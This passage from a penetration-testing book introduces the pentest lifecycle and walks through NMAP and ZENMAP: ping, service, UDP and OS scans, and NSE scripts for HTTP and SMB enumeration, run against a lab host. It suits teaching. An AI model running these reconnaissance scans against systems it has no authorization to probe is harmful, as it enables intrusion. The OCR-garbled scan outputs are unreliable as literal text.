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Introduction 


Vulnerability assessment and penetration testing have become very 
important, especially in the past couple of years. Organizations often have 
complex networks of assets storing sensitive data, and such assets are 
exposed to potential threats from the inside as well as from the outside. To 
get an overview of the security posture of an organization, conducting a 
vulnerability assessment is an essential step. Performing penetration tests 
requires a well-planned and methodical approach. 

To help you perform various tasks across the phases of the penetration 
testing lifecycle, there are tons of tools, scripts, and utilities available. Linux 
distributions such as Kali Linux even provide bundled tools to perform 
these tasks. 

It is natural to get overwhelmed with the number of tools available. 
However, there are a few tools that are so powerful and flexible that they 
alone can perform most of the tasks across the phases of the penetration 
testing lifecycle. 

This book will get you started with the fundamentals of three such 
tools: NMAP, OpenVAS, and Metasploit. Just by using these three tools 
alone, you will acquire extensive penetration testing capabilities. 

By the end of this book, you'll have a substantial understanding of 
NMAP, OpenVAS, and Metasploit and will be able to apply your skills in 
real-world pen testing scenarios. 


xi 


CHAPTER 1 


Introduction to NMAP 


Vulnerability assessment and penetration testing have gained high 
importance especially in the last couple of years. Organizations often have 
a complex network of assets storing sensitive data. Such assets are exposed 
to potential threats from inside as well as from outside the organization. To 
get an overview of the security posture of the organization, conducting a 
vulnerability assessment is essential. 

It is important to understand the clear difference between vulnerability 
assessments and penetration testing. To understand this difference, let’s 
consider a real-world scenario. You notice that your neighbor’s door isn’t 
locked properly, and the neighbor is not at home. This is a vulnerability 
assessment. Now if you actually open the neighbor’s door and enter the 
house, then that is a penetration test. In an information security context, 
you may notice that the SSH service is running with weak credentials; this 
is part of a vulnerability assessment. If you actually use those credentials 
to gain access, then it is a penetration test. Vulnerability assessments 
are often safe to perform, while penetration tests, if not performed in a 
controlled way, can cause serious damage on the target systems. 

Thus, a vulnerability assessment is one of the essential prerequisites 
for conducting a penetration test. Unless you know what vulnerabilities 
exist on the target system, you won’t be able to exploit them. 
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Performing penetration tests requires a well-planned and 
methodological approach. It is a multistep process. The following are some 
of the phases of penetration testing: 


e Information gathering: Information gathering 
is the most important phase of the penetration 
testing lifecycle. This phase is also referred to as 
reconnaissance. It involves the use of various passive 
and active techniques to gather as much information as 
possible about the target system. Detailed information 
gathering lays a solid foundation for further phases in 
the penetration testing lifecycle. 


e Enumeration: Once you have basic information about 
the target, the enumeration phase uses various tools 
and techniques to probe the target in detail. It involves 
finding out the exact service versions running on the 
target system. 


e Vulnerability assessment: The vulnerability 
assessment phase involves the use of various tools 
and methodologies to affirm the existence of known 
vulnerabilities in the target system. 


e Gaining access: From the previous phase, you have a list 
of probable vulnerabilities for your target. You can now 
attempt to exploit these vulnerabilities to gain access to 
the target system. 


e Escalating privileges: You may get access to your 
target system by exploiting a particular vulnerability; 
however, the access may be restricted. To infiltrate 
deeper, you need to use various techniques and 
escalate the privileges to that of highest level such as 
administrator, root, and so on. 
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e Maintaining access: Now that you have worked hard 
gaining access to the target system, you will certainly 
want it to persist. This phase involves using various 
techniques to make the access to the target system 
persistent. 


e Covering tracks: The penetration process may create 
garbage files, modify configuration files, change registry 
entries, create audit logs, and so on. Covering your 
tracks involves cleaning up all the traces left during the 
previous phases. 


To perform various tasks in these phases, there are hundreds of tools, 
scripts, and utilities available. Linux distributions such as Kali Linux even 
provide bundled tools to perform these tasks. 

It is natural to get overwhelmed with the number of tools available. 
However, there are a few tools that are so powerful and flexible that they 
alone can perform most of the tasks in all of these phases. 

This book is about three such tools: NMAP, OpenVAS, and Metasploit. 
Just having these three tools in your arsenal can provide extensive 
penetration testing capabilities. 

Table 1-1 describes how these tools could be used in various phases of 
the penetration testing lifecycle. 
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Table 1-1. Tools for Pen Testing Phases 


Penetration Testing Phase Tool 

Information gathering NMAP, Metasploit 
Enumeration NMAP, Metasploit 
Vulnerability assessment OpenVAS 

Gaining access Metasploit 
Escalating privileges Metasploit 
Maintaining access Metasploit 
Covering tracks Metasploit 


From this table, it is evident that the three tools are capable of 
performing the tasks across all the phases of the penetration testing 
lifecycle. 

This book focuses on these three tools and helps you get started with 
fundamentals of each of these tools. This chapter will cover NMAP. 


NMAP 


Now that you have a fair idea of the different phases in the penetration 
testing lifecycle and what tools are required, let’s move on to our first 
tool, NMAP. You’ll learn about various features of NMAP including the 
following: 


e Installing NMAP 
e Using NMAP with ZENMAP 
e Understanding the NMAP port states 


e Conducting basic scanning with NMAP 
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e Understanding TCP scans versus UDP scans 

e Enumerating target operating systems and services 
e Fine-tuning the scans 

e Using NMAP scripts 


e Invoking NMAP from Python 


NMAP Installation 


NMAP can be installed on both Windows and Unix-based systems. To 
install NMAP on Windows, simply go to https: //nmap.org/download. 
html, download the executable, and install it. 

For Unix-based systems, you can install NMAP from the command 
line. Security distributions like Kali Linux have NMAP installed by default. 
However, for other regular distributions, it needs to be installed separately. 

You can simply use the command apt install nmap for Debian- 
based systems, as shown in Figure 1-1. This command will install NMAP 
along with all the required dependencies. 
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root @sagar-virt 


root@sagar-virtual-machine:~# nmap 
Command ‘nmap’ not found, but can be installed with: 
apt install nmap 


root@sagar-virtual-machine:~# apt install nmap 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following additional packages will be tnstalled: 
libblas3 Liblinear3 
Suggested packages: 
Liblinear-tools Liblinear-dev ndiff 
The following NEW packages will be installed: 
Uibblas3 Liblinear3 nmap 
© upgraded, 3 newly Installed, © to renove and 119 not upgraded. 
Need to get 5,353 kB of archives. 
After thts operation, 24.5 MB of additional disk space will be used. 
Do you want to continue? [Y/n] y 
Get:1 http://in.archive.ubuntu.com/ubuntu bionic/main amd64 Libblas3 amd64 3.7.1-d4ubuntui [140 kB] 
Get:2 http://tn.archive.ubuntu.com/ubuntu blonic/main and64 Liblinear3 amd64 2.1.0+dfsg-2 [39.3 kB] 
Get:3 http://tn.archtve.ubuntu.com/ubuntu blonic/matn andó4 nmap amd64 7.60-1ubuntuS [5,174 kB] 


72% [3 nmap 3,717 kB/5,174 kB 72%) 40075% [3 nmap 
3,914 kB/S,174 kB 76%) ao0Fetched 5,353 kB in 13s (425 k 
B/s) 


Selecting previously unselected package Uibblas3:and64, 

(Reading database ... 125731 files and directorles currently installed.) 
Preparing to unpack .../libblas3_3.7.1-4ubuntul_and64.deb ... 

Unpacking Libblas3:and64 (3,7.1-4ubuntul) ... 

Selecting previously unselected package liblinear3:amdós. 

Preparing to unpack .../liblinear3_2.1.0+dfsg-2_and64.deb ... 

Unpacking Liblincar3:and64 (2.1.0+dfsg-2) . 
Selecting previously unselected package nmap. 

Preparing to unpack .../nmap_7.60-1ubuntu5_and64.deb ... 

Unpacking nmap (7.60-1ubuntuS) ... 

Setting up Libblas3:amd64 (3.7.1-4ubuntul) ... 

update-alternatives: using /use/lib/x86_64-Linux-gnu/blas/libblas.so.3 to provide /usr/1lib/x86_64-Linux-gnu/Libblas.so.3 (LibbL 
aS.S0.3-x86_64-Linux-gnu) tn auto mode 

Processing triggers for Libc-bin (2.27-3ubuntu1) ... 

Processing triggers for man-db (2.8.3-2) ... 

Setting up Liblinear3:amd64 (2.1.0+dfsg-2) ... 

Setting up nmap (7.60-lubuntuS) ...s###skaeeeRneREReaeesKoReeEReNsERKARaERRRARERARRARROR AER... 
Processing triggers for libc-bin (2.27-3ubuntul) .. .srs#erensteraneesesnaeRensaeatKsneReR seer e RST 
root@sagar-virtual-machtne:-# E 


Figure 1-1. Installing NMAP on a Debian-based system 


Introduction to NMAP and ZENMAP 


NMAP was initially a command-line utility. On a Linux terminal, you can 
simply type the command nmap to get started. Figure 1-2 shows the output 
of the nnap command. It displays the various parameters and switches that 
need to be configured to scan a target. 
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root@kali: ~ 


File Edit View Search Terminal Help 

root@kali:~# nmap 

Nmap 7.60 ( https://nmap.org ) 

Usage: nmap [Scan Type(s)] [Options] {target specification} 

TARGET SPECIFICATION: 
Can pass hostnames, IP addresses, networks, etc. 
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
-iL <inputfilename>: Input from list of hosts/networks 
-iR <num hosts>: Choose random targets 
--exclude <host1[,host2][,host3],...>: Exclude hosts/networks 
--excludefile <exclude file>: Exclude list from file 

HOST DISCOVERY: 
-sL: List Scan - simply list targets to scan 
-sn: Ping Scan - disable port scan 
-Pn: Treat all hosts as online -- skip host discovery 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocol list]: IP Protocol Ping 
-n/-R: Never do DNS resolution/Always resolve [default: sometimes] 
--dns-servers <serv1[,serv2],...>: Specify custom DNS servers 
--system-dns: Use OS's DNS resolver 
--traceroute: Trace hop path to each host 

SCAN TECHNIQUES: 
-SS/sT/SA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans 
-sU: UDP Scan 


Figure 1-2. Output of the nmap command on the terminal 


ZENMAP is a graphical front end to NMAP. It offers the same 
functionality in a more user-friendly way. ZENMAP is part of the default 
Kali Linux installation and can be accessed at Applications > Information 
Gathering > ZENMAP. Figure 1-3 shows the initial ZENMAP screen. The 
ZENMAP interface has three main configurable settings. 


e Target: This can be a single IP address, list of multiple 
IPs, or an entire subnet. 


e Profile: ZENMAP has set of several predefined scan 
profiles. The profiles are classified based on the types of 
scans available in NMAP. Either you can choose among 
the available profiles or you can have a custom scan as 
per your requirements. 
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e Command: Once you enter a target and select a 
predefined profile, ZENMAP will autopopulate the 
Command field. You can also use this field if you want to 
execute a customized scan against the predefined profile. 


Zenmap coo 


Target v Profile 


Figure 1-3. Initial screen/interface of ZENMAP 


NMAP Port States 


Though the current version of NMAP is capable of performing many tasks, 
it initially started out as a port scanner. NMAP has certain ways to detect 
whether the port on the target system is open or closed. NMAP detects the 
status of the target port using predefined states as follows: 


Open: The Open state indicates that an application 
on the target system is actively listening for 
connections/packets on that port. 


Closed: The Closed state indicates there isn’t any 
application listening on that port. However, the port 
state could change to Open in the future. 
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Filtered: The Filtered state indicates that either a 
firewall, a filter, or some kind of network hurdle is 
blocking the port and hence NMAP isn’t able to 
determine whether it is open or closed. 


Unfiltered: The Unfiltered state indicates that ports 
are responding to NMAP probes; however, it isn’t 
possible to determine whether they are open or 
closed. 


Open/Filtered: The Open/Filtered state indicates 
that the port is either filtered or open; however, 
NMAP isn’t precisely able to determine the state. 


Closed/Filtered: The Closed/Filtered state indicates 
that the port is either filtered or closed; however, 
NMAP isn’t precisely able to determine the state. 


Basic Scanning with NMAP 


NMAP is a complex tool with numerous options and switches available. 
In this section, you'll see various NMAP usage scenarios starting with the 
most basic scans. 

Before you get into the actual scanning, it is important to note that 
NMAP is a noisy tool. It creates a lot of network traffic and at times can 
consume much bandwidth. Many of the intrusion detection systems and 
intrusion prevention systems may detect and block NMAP traffic. It is said 
that a basic default NMAP scan on one single host can generate more than 
4MB of network traffic. So, even if you do a basic scan on an entire subnet, 
it will create around 1GB of traffic. Hence, it is essential to perform NMAP 
scans with complete knowledge of the switches being used. 
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Basic Scan on a Single IP 
Here’s the command: 
nmap -sn <target IP address> 


Let’s start with a basic ping scan on a single target. A ping scan will 
not check for any open ports; however, it will tell you whether the target is 
alive. Figure 1-4 shows the output of a ping scan done on a single target IP 
address. 


Figure 1-4. Output of basic NMAP scan done on single IP address 


Basic Scan on an Entire Subnet 
Here’s the command: 
nmap -sn <target IP subnet> 


In a practical scenario, you may have multiple IP addresses that you 
need to check. To get a quick overview of which hosts in a given subnet are 
alive, you can do an NMAP ping scan on the entire subnet. A subnet is just 
a logical division of the network. Scanning the entire subnet will give you 
an overview of what systems are present in the network. Figure 1-5 shows 
the output of a ping scan done on subnet 192.168.25.0-255. You can see 
that out of 255 hosts, only seven hosts are up and running. Now you can 
further probe these seven hosts and get more detailed information. 
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Zenmap o0 
Scan Toots Profile Help 
Target: | 192.168.25.0-255 v Profle: Ping scan [Scan] 
Command: [raap -sn 192.168 25.0-255 
DHa sws Nmap Output | Ports / Hosts Topology Host Detats Scans 
a Wee e nmap -sn 192 168.25,.0-255 ¿| E [Detats 


Starting Naap 7.60 à bttos://nmap.org } at 2018-09-17 11:03 IST 
Nmap scan report for 192.168.23.1 

Host is up (0.600288 latency) 

BAC Address: 00:50:56:C0:00:08 (VMware) 

Nrap scan report for 192.168.25.2 

Host is up (6.00630 la 


Nrap scan report f 
Most is up (0.009 


BAS Address: 09:0 61 (Weare 

Neap scan report (292.168.25.132) 
Host is up (6.006355 Latency) 

BAC Address: 06:8C:29:4C:B8:59 (VMware) 
Nrap scan report for 192.168.25.133 


Most is up (6.606295 Latency) 
i 06:00:29: F6:AA:96 (VMware) 
t for 192,168,23,234 


Nmap scan report for 192.168.25.128 
Host is up 
Nean done; 256 IP addresses (7 hosts up) scanned in 2.26 seconds 


Famer Hosts 


Figure 1-5. Output of basic NMAP scan done on a subnet 


Scan Using an Input File 
Here’s the command: 
nmap -sn -iL <file path> 


There might be a scenario where you need to scan a wide range of 
IP addresses. Instead of entering them in a comma-separated format to 
NMAP, you can put them all in a file and feed that file to the NMAP engine. 
Figure 1-6 shows the content of the hosts. txt file that contains a list of IP 
addresses. 
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root@kali: ~ 0o09 


File Edit View Search Terminal Help 


root@kali:~# cat Desktop/hosts.txt 
192.168.25.129 
192.168.25.130 


root@kali: ~# [] 


Figure 1-6. Hosts file containing a list of IP addresses to be 
scanned 


Now you can simply feed the hosts.txt file to NMAP and perform the 
scan, as shown in Figure 1-7. 


Zenmap oo°9o 
Scan Tools Profile Help 


Target: ly Profile: ’ 


Command: [nmap -sn -iL /root/Desktop/hosts.txt 


Services Nmap Output Ports / Hosts Topology Host Details Scans 
nmap -sn -iL /root/Desktop/hosts. txt -~ Details 


OS Host 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:22 IST 
@ 192.168.25.13 Nmap scan report for 192.168.25.129 


Host is up (@.00040s Latency). 


MAC Address: 00:0C:29:11:8E:81 (VMware) 
Nmap scan report for 192.168.25.130 


Host is up (0.00070s latency). 
MAC Address: 00:0C:29:03:42:04 (VMware) 
Nmap done: 2 IP addresses (2 hosts up) scanned in 0.45 seconds 


N > 
Filter Hosts 


Figure 1-7. Output of basic NMAP scan done on multiple IP 
addresses listed in hosts. txt file 


Reason Scan 
Here’s the command: 


nmap --reason<target IP address> 
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In anormal NMAP scan, you might get a list of open ports; however, 
you will not know the reason why NMAP reported a particular port as 
open. The NMAP reason scan is an interesting option where NMAP 
provides a reason for every port reported as open, as shown in Figure 1-8. 
NMAP scans are based on the TCP flags that are set in the request and 
response. In this case, the open ports were detected based on the SYN and 
ACK flags set in TCP packets. 


Zenmap 0o00 
Scan Tools Profile Help 


Target: |192.168.25.130 v Profile: | v |Scan} 


Command: [nmap --reason 192.168.25.130 | 


Hosts || Services | | Nmap Output | Ports / Hosts Topology Host Details Scans 
OS Host . nmap --reason 192.168.25.130 a | Details 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:31 IST 
Nmap scan report for 192.168.25.130 

Host is up, received arp-response (0.0016s latency). 

Not shown: 991 closed ports 

Reason: 991 resets 


PORT STATE SERVICE REASON 

21/tcp open ftp syn-ack ttl 128 
25/tcp open smtp syn-ack ttl 128 
110/tcp open pop3 syn-ack ttl 128 
135/tcp open msrpc syn-ack ttl 128 
139/tcp open netbios-ssn syn-ack ttl 128 
143/tcp open imap syn-ack ttl 128 


445/tcp open microsoft-ds syn-ack ttl 128 
587/tcp open submission syn-ack ttl 128 
3389/tcp open ms-wbt-server syn-ack ttl 128 
MAC Address: 90:0C:29:03:42:04 (VMware) 


N > Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds 
Filter Hosts yi 


Figure 1-8. Output of reason NMAP scan done on a single IP 
address 


Supported Protocols 
Here’s the command: 
nmap -sO<target IP address> 


As part of information gathering and reconnaissance, it may be 
worthwhile to know what IP protocols are supported by the target. Figure 1-9 
shows that this target is supporting two protocols: TCP and ICMP. 
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Zenmap o0 
Scan Tools Profile Help 


Target: | 192.168.25.129 v Profile: Y San 
Command: {nmap -sO 192.168,25.129 i 


Services Nmap Output Ports / Hosts Topology Host Details Scans 
OS Host . nmap -sO 192.168.25.129 - Details 


= Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:27 IST 

W 192.168.25.13 Nmap scan report for 192.168.25.129 

Host is up (0.000975 latency). 

Not shown: 222 closed protocols, 32 open|filtered protocols 

PROTOCOL STATE SERVICE 

1 open icmp 

6 open tcp 

MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 240.68 seconds 
N > 

Filter Hosts 


Figure 1-9. Output of NMAP protocol scan done on a single IP address 


Firewall Probe 


In an enterprise network full of firewalls, intrusion detection systems, and 
intrusion prevention systems, itis quite possible that your NMAP scans 
will not only be detected but also be blocked. NMAP offers a way to probe 
whether its scans are getting filtered by any intermediate device like a 
firewall. Figure 1-10 shows that all 1,000 ports that NMAP scanned were 
unfiltered; hence, there wasn’t the presence of any filtering device. 


Zenmap o0 
Scan Tools Profile Help 


Target: | 192.168.25.129 v Profile: vy Scan 


Command: | nmap -sA |192.168.25.129 


Services Nmap Output Ports / Hosts Topology Host Details Scans 
nmap -sA 192.168, 25,129 - Details 


OS Host 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:36 IST 
W 192.168.25.13 | Nmap n see for isa see's 29 

Host is up (0.0028s Latency). 

ALL 1000 scanned ports on 192.168.25.129 are unfiltered 

MAC Address; 00:0C:29:11:8E:B1 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 6.43 seconds 


N > 
Filter Hosts 


Figure 1-10. Output of NMAP firewall probe done against a single IP 
address 
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Topology 


ZENMAP has an interesting feature that helps you visualize the network 
topology. Say you did a ping scan on the subnet and found a few hosts 
alive. Figure 1-11 shows the network topology diagram for the hosts that 
you found alive. The diagram can be accessed using the Topology tab 
within the ZENMAP interface. 


@is2r10025.12¢ 


Oinin 


Figure 1-11. Host topology diagram in ZENMAP 


Quick TCP Scan 


Here’s the command: 
nmap -T4 -F<target IP address> 


Now that you have list of hosts that are alive within the subnet, you can 
perform some detailed scans to find out the ports and services running 
on them. You can set the target IP address, select Quick Scan as the 
profile, and then execute the scan. Figure 1-12 shows the output of a scan 
highlighting several ports open on the target. 
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Zenmap ceo 
Scan Toots Profile Help 
Target: | 192.168,25.129 v Profle: Quick scan 
Command: [reap -74 -F 192.168.25.129 


Hosts | Services Nenap Output Pons /Hosts Topology Host Detals Scans 


[nmap -T4 -F 292.168.25.129 Detats 


© Starting Nmap 7.60 ( https://nnap.org }) at 2018-09-17 11:23 IST 


ALi /tep open rpcbind 
139/tep open netdios-ssn 
445/tep open microsoft-ds 


2049/tep open nfs 
2421 /tep open ecproxy-ftp 
aysal 


S432/tep open postgresql 
wne 


6000/tep open X12 
8009/tcp open ajpl3 
WAC Address: 00:9C:29:11:66:82 (VMware) 


Nmap dene: 1 IP address (1 host up) scanned in 0.24 seconds 


Po 
Finer Hosts 


Figure 1-12. Output of quick TCP NMAP scan done on a single IP 
address 


Service Enumeration 


Here’s the command: 
nmap -sV<target IP address> 


Now that you have a live host and you also know which ports are 
open, it’s time to enumerate the services associated with those ports. For 
example, you can see that port 21 is open. Now you need to know which 
service is associated with it and what is the exact version of the server 
catering the service. You can use the command nmap -sV <target IP 
address>, as shown in Figure 1-13. The -sV switch stands for the service 
version. Enumerating services and their versions provides a wealth of 
information that can be used to build further attacks. 
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Zenmap ceo 
Scan Toots Profile Help 

Target: | 192.168.25.129 v Profite: + Sean) 
Command: [reap -sV 192.163. 26.129 

Hosts | Services Nmap Output | Ports / Hosts Topology Host Details Scans 

CS Hot nmap -3V 192.168 25.129 +] © [Detats 


Starting Naap 7.60 ( httos://nmop.org } at 2018-09-17 14:52 IST 
Naap scan report for 192.268.25,129 
Most is up (0.00145 Latency 

à 977 closed ports 


PORT STATE SERVICE VERSION 

2i/tep open ftp vettpd 2.3.4 

22/tep open ssh OpenSSH 4.7p1 Debian Bubuntul (protocot 2.0) 
23/tep open telnet Linar tetnetd 

25/tep open satp Postfix smtpd 

S3/tep open domain TSC GIND 9.4.2 

B0/tep open http Apache httpd 2.2.6 ((Ubunte) OAV/2) 
Ali/tep open rpcbind 2 (RPC #100000) 

139/tcp open netbios-ssm Sambo smbd 3.X - 4.x (workgroup: WORKGROUP) 
445/tep open netbios-ssm Samba smbd 3.X - 4,X (workgroup: WORKGROUP) 
S12/tcp open exec netkit-rsh rexecd 

513/tcp open login Openbso or Solaris rlogind 

S14/tcp open tepwrapped 

1099/tep open rmiregistry GNU Classpath grairegistry 

1524/tep open shell Metasploitable root shell 

2049/tep open nts 2-4 (RPC #100003) 

2222/tep open ftp ProfTPO 1.3.3 

3306/tep open mysql MySOL 5.0.51a-Subuntus 

S432/tep open postgresql PostgreSOL DB 8.3.0 - 8.3.7 

3900/tcp open vac VNC (protocol 3.3) 

6000/tcp open Xil (access denied) 

6067/tep open irc Unreal IRCd 

S009/tep open ajpas Apache Jserv (Protocol vi.3) 

$180/tep open http Apache Tomcat/Coyote JSP engine 1.1 

BAC Address: 00:0C:29:11:86:81 (VMware) 

Service Info; Hosts: retasploitabdle.tocaldomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/ọ:linux:linux kernel 


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ 
1 IP address (1 host up) scanned in 13.89 seconds 


es 
Fiter Hosts 


Figure 1-13. Output of NMAP service scan done on a single IP 
address 


UDP Port Scan 


Here’s the command: 
nmap -sU -p 1-1024<target IP address> 


All the scans that you did so far gave you information only about TCP 
ports. However, the target may also have services running on UDP ports. 
A default NMAP scan probes only TCP ports. You need to exclusively 
scan for UDP ports and services. To scan common UDP ports, you can 
use the command nmap -sU -p 1-1024 <target IP address>. The -sU 
parameter will tell the NMAP engine to specifically scan UDP ports, while 
the -p 1-1024 parameter will limit the NMAP to scan only ports in the 
range 1 to 1024. Itis also important to note that the UDP port scan takes a 
significantly longer time than a normal TCP scan. Figure 1-14 shows the 
output of asample UDP scan. 
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‘Zenmap ooo 


Scan Tods Profile Help 
Target: | 192.168 25.129 + Prete + Sean) 
Command: nmap -sU -p 1-1024 192 168,25 


Servces _| | Nmap Outpt | Pets Hosts |i Topotog Í Host Detats | Scans 


os Host nmap -3U -p 1-1024 192 168.25.129 ¿| 1 Detais 


if/omap.org } ot 2018-09-17 21:52 IST 
) ON port because retransmission cap hit (10) 


motdios -ns 
etdios -dga 


1:96:01 (Vare) 


CE * nap done: 1 IP address (1 host up) scanned in 1225.65 seconds 
Fier Hosts 


Figure 1-14. Output of basic NMAP UDP scan done on a single IP 
address 


OS Detection 


Here’s the command: 
nmap -O<target IP address> 


Now that you know how to probe for open ports and enumerate 
services, you can go further and use NMAP to detect the operating system 
version that the target is running on. You can use the command nmap 
-0 <target IP address>. Figure 1-15 shows the output of an NMAP 
operating system detection probe. You can see that the target is running 
Linux based on kernel 2.6.X. 
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Lenmap ceo 
Scan Toots Protte Help 
Target [192.1682 v Profle: "| Scan 
Command: [rrap dis 
Hoste | Servces wut | Ports / Hosts Topotogy Host Details | Scans 
os ia + mup -O 192.168.25.129 ¿| i |Detats 
» 7.60 ( https://naap. org ) at 2018-09-17 14:53 IST 


r 192.108.293.129 
latency) 


1 977 closed ports 
PORT STATE SERVICE 


139/tcp open netbios-ssa 
443/tep open sicrosoft-ds 
Siz/tep open exec 

Si3/tep open Login 
Si4/tcp open shott 
1099/tep open rniregistry 
1524/tep open ingrestock 
2049/tep open nfs 
2121/tep open ceproxy-ftp 
3306/tep open eysql 
S432/tep open postgresql 
5900/tcp open vac 
6000/tcp open X11 
6667/tcp open irc 
9009/tcp open ojpi3 
9190/tcp open unknown 

BAC Address; 00:00:29 


1 cpe:/0: linux: linux _kernel:2.6 
OS _details: Linux 2.6.9 - 2.6.33 
Network Distance: 1 hop 


OS detection performed. Please report any incorrect results at Nttps://nzap.org/subait/ 
à 1 IP address (1 host up) scanned in 2.16 seconds 
a > 
Finer Hosts 


Figure 1-15. Output of NMAP OS detection scan done on a single IP 
address 


Intense Scan 


Here’s the command: 
nmap -T4 -A -v <target IP address> 


So far, you have used NMAP for performing individual tasks such 
as port scanning, service enumeration, and OS detection. However, it is 
possible to perform all these tasks with a single command. You can simply 
set your target IP address and select the intense scan profile. NMAP will do 
a TCP port scan, enumerate services, and in addition run some advanced 
scripts to give more useful results. For example, Figure 1-16 shows the 
output of an NMAP intense scan that not only enumerated an FTP server 
but also highlighted that it has Anonymous FTP access enabled. 
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PORT STATE SER VERSION 
2istep open ftp vsftpd 2.3.4 
|_ftp-anon: Anonymous FTP Login allowed (FTP code 230) 


ə 192.160.25.128 
p 


Figure 1-16. Output of intense NMAP scan done on a single IP address 


NMAP Scripts 


NMAP has long evolved from a basic port scanner. It is way more powerful 
and flexible than just a port scanner. NMAP’s functionality can be 
extended using NMAP scripts. The NMAP scripting engine is capable of 
executing scripts allowing in-depth target enumeration and information 
gathering. NMAP has about 600 scripts serving different purposes. In 

Kali Linux, the scripts can be found at /usr/share/nmap/scripts. The 
next section will discuss how you can use NMAP scripts for enumerating 
various TCP services. 


HTTP Enumeration 


HTTP is a common service found on many hosts. It runs on port 80 by 
default. NMAP has a script for enumerating HTTP services. It can be 
invoked using the command nmap -script http-enum <target IP 
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address>. Figure 1-17 shows the output of the http-enum script. It shows 
various interesting directories hosted on the web server that may be useful 
in building further attacks. 


Zenmap 
Scan Tools Profile Help 
Target: |192.168.25.129 y 


Profile: 


Command: [nmap --script http-enum 192.168.25.129 
ervices | | Nmap Output | Ports / Hosts Topology Host Details Scans 


OS Host + | nmap --script http-enum 192.168.25.129 


| 
| /tikiwiki/: Tikiwiki 

| /test/: Test page 

| /phpinfo.php: Possible information file 
| 

| 

| 


/phpMyAdmin/: phpMyAdmin 
/doc/: Potentially interesting directory w/ listing on ‘apache/2.2.8 (ubuntu) dav/2' 
f/icons/: Potentially interesting folder w/ directory listing 


|_ /index/: Potentially interesting folder 
111/tcp rpcbind 

139/tcp netbios-ssn 

445/tep microsoft-ds 

512/tep exec 

513/tep login 

514/tcp shell 


1099/tcp open rmiregistry 

1524/tcp open ingreslock 

2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
mysql 


3306/tcp 

| 5432/tcp postgresql 
5900/tcp vne 
6000/tcp xıl 
6667/tcp ire 
8009/tcp ajp13 
8180/tcp unknown 


http-enui 
/admin/: Possible admin folder 
/admin/index.html: Possible admin folder 
/admin/login. html: Possible admin folder 
/admin/admin.html: Possible admin folder 
/admin/account.html: Possible admin folder 
/admin/admin_login. html: Possible admin folder 
/admin/home. html: Possible admin folder 
/admin/admin-login. html: Possible admin folder 
/admin/adminLogin. html: Possible admin folder 
f/admin/controlpanel.html: Possible admin folder 
/admin/cp.html: Possible admin folder 
/admin/index.jsp: Possible admin folder 
/admin/login.jsp: Possible admin folder 
/admin/admin.jsp: Possible admin folder 
/admin/home.jsp: Possible admin folder 
/admin/controlpanel. jsp: Possible admin folder 
/admin/admin-login. jsp: Possible admin folder 
fadmin/cp.jsp: Possible admin folder 

T > /admin/account.jsp: Possible admin folder 

/admin/admin_login.jsp: Possible admin folder 


Fitter Hosts i tadminsiadmini amin dans Nanaihia ndmin Saldan 


Figure 1-17. Output of NMAP script http-enum executed against 
target IP address 
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HTTP Methods 


HTTP supports the use of various methods such as GET, POST, DELETE, 
and so on. Sometimes these methods are left open on the web server 
unnecessarily. you can use the NMAP script http-methods, as shown in 


INTRODUCTION TO NMAP 


Figure 1-18, to enumerate HTTP methods allowed on the target system. 


Scan Tools Profile Help 


Target: |192.168.25.129 ’ 


Command: [nmap --script http-methods [192.168.25.129 


Hosts Services 


os 


Nmap Output Ports / Hosts Topology Host Details Scans 


Details 


Wan nmap ~-script http-methods 192.163.25.129 


Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-28 12:22 IST 
Nmap scan report for 192.168.25.129 

Host is up (9.60245 latency). 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tep 
22/tep 
23/tcp 
25/tcp 
53/tcp open 
80/tcp open 

| http-methods: 
l Supported Methods: GET HEAD POST OPTIONS 
lll/tep open rpebind 

139/tcp open 
445/tcp open 
$12/tcp open 
513/tcp open 
Sid/tcp open 


open ftp 
open 
open 


open 


netbios-ssn 
microsoft-ds 
exec 

login 

shell 


1099/tcp open 
1524/tcp open 
2049/tcp open 
2121/tcp open 
3306/tcp open 
5432/tep open 
5900/tcp open 
6000/tcp open 
6667/tcp open 
8009/tcp open 
$180/tcp open 


rmiregistry 
ingreslock 
nfs 
ccproxy-ftp 
mysql 
postgresql 
vne 

xıı 

ire 

ajpi3 
unknown 


| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS 
HAC Address: 08:0C:29:11:8E:B1 (VMware) 


Nmap done: 1 IP address {1 host up) scanned in 2.30 seconds 


B 
Filter Hosts 


Figure 1-18. Output of NMAP script http-methods executed against a 
target IP address 
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The following are some additional NMAP scripts for HTTP enumeration: 
e http-title 
e http-method-tamper 
e http-trace 
e http-fetch 
e http-wordpress-enum 
e http-devframework 
e http NSE Library 


SMB Enumeration 


Server Message Block (SMB) is a protocol extensively used for network file 
sharing. SMB commonly runs on port 445. So, if you find a target with port 
445 open, you further enumerate it using NMAP scripts. you can invoke the 
SMB enumeration by using the command nmap -p 445 -script-smb-os- 
discovery <target IP address>. The -p 445 parameter triggers the script 
to run against port 445 on the target. The script output shown in Figure 1-19 
will give you the exact SMB version, the OS used, and the NetBIOS name. 


60 ( Nttps://nmap.org ) at 2018-09-37 15:30 IST 
for 192.168.25,129 
0535 ncy) 


443/tep open nic 
MAC Address: 00;0C:29:11:06:61 (VMware) 


Maap_done: 1 IP address (1 host up) scanned in 6.52 seconds 
| lind 


Finer Hosts 


Figure 1-19. Output of NMAP script smb-os-discovery executed 
against a target IP address 
